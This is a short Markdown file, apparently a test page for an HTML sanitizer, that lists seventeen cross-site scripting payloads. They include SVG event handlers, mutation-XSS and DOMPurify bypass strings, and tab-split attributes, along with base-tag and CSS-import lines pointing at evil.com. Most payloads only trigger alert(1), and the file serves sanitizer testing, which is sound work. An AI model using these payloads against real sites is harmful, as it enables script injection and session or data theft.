---
license: mit
---
# XSS Round 2

## Test A: SVG animate
<svg><animate onbegin="alert(1)" attributeName="x" dur="1s">

## Test B: SVG set
<svg><set attributeName="onmouseover" to="alert(1)">

## Test C: SVG foreignObject
<svg><foreignObject><body onload="alert(1)"></body></foreignObject></svg>

## Test D: SVG use external
<svg><use href="data:image/svg+xml,<svg onload=alert(1)>"></use></svg>

## Test E: Style tag
<style>body{background:red}</style>

## Test F: Base tag
<base href="https://evil.com/">

## Test G: Object with SVG
<embed src="data:image/svg+xml,<svg onload=alert(1)>">

## Test H: Anchor target
<a href="https://evil.com" target="_blank" rel="">Click me</a>

## Test I: noscript
<noscript><img src=x onerror=alert(1)></noscript>

## Test J: CSS import
<style>@import url("https://evil.com/steal.css")</style>

## Test K: MathJax/KaTeX
$$\href{javascript:alert(1)}{click}$$

## Test L: Tab/newline bypass
<img src=x on	error="alert(1)">
<a hre	f="javascript:alert(1)">test</a>

## Test M: HTML comment bypass
<img src=x onerror="alert(1)"--!>

## Test N: Mutation XSS
<svg><style><img src=x onerror=alert(1)>

## Test O: DOMPurify bypass attempts
<math><mtext><table><mglyph><style><!--</style><img src=x onerror=alert(1)>
<math><mtext><option><FAKEFAKE><option></option><mglyph><svg><mtext><style><path id="</style><img onerror=alert(1) src>">

## Test P: noembed
<noembed><img src=x onerror=alert(1)></noembed>

## Test Q: Title element
<svg><title><img src=x onerror=alert(1)></title></svg>